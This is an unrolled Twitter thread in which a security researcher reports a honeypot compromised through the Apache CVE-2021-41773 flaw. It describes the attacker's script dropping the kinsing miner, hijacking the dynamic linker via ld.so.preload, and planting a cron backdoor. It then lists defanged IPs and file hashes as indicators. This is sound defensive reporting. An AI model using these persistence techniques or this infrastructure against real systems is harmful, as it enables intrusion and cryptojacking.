Share this page!

Tyler Hudak Profile picture
Twitter logo
8 Oct, 9 tweets, 2 min read
Set up a honeypot last night that was vulnerable to CVE-2021-41773 #Apache code execution. Just got compromised. This is what happened.

IOCs in last tweet.
Attacker ran the following code through the CVE:
ap[.]sh does a bunch of stuff, including:
- Downloading 2 files from the same IP - kinsing and libsystem[.]so
- executes kinsing
...
ap[.]sh also:
- tries to put libsystem[.]so into /etc/ld.so.preload (Dynamic Linker Hijacking - T1574.006)
- kills multiple processes/cron tasks
- adds a backdoor cron job whh downloads ap[.]sh from 185[.]191[.]32[.]198 (IP no longer up)
Third file is created when kinsing executes (I think) - kdevtmpfsi

All 3 files were in /tmp but may also attempt to put in /dev

All 3 hashes (at end) are on VT
Found another crontab that downloads unk[.]sh from 185[.]191[.]32[.]198
kinsing and kdevtmpfsi are running. They are both connecting out to multiple IPs and kinsing is listening on TCP/31458
IOC:
195[.]19[.]192[.]28
185[.]191[.]32[.]198
194[.]87[.]102[.]77
193[.]164[.]150[.]99
ap[.]sh (MD5 539ce9f7582c5382a552545eb3f5819a)
kinsing (648effa354b3cbaad87b45f48d59c616)
libsystem[.]so (ccef46c7edf9131ccffc47bd69eb743b)
kdevtmpfsi (8c6681daba966addd295ad89bf5146af)
Coworker @StevenErwin found this which is pretty much what I'm seeing on the system: trendmicro.com/en_ca/research…

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Tyler Hudak

Tyler Hudak Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @SecShoggoth

Tyler Hudak Profile picture
4 May
I've worked a lot of #ransomware incidents and I've found that most companies don't realize what the true cost of a ransomware incident is.

But isn't it just paying the ransom or restoring and you're done? Nope. Here are the (potential) costs (based on my experience): (1/X)
Cost 1. Insurance

Wait, won't insurance help me recover money? Yep. But there's a little thing called a deductible. So, while this isn't a direct cost, it's still gonna cost you money. (2/X)
Cost 2. Incident Response

The ransomware didn't just appear in your network. You need to figure out root cause, what the attackers did in your network, and what (if any) data was taken. If you don't have IR figure all this out, it will happen again. (3/X)
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @SecShoggoth has new unrolls!

Check out other threads from @SecShoggoth!

Read all threads by @SecShoggoth

:(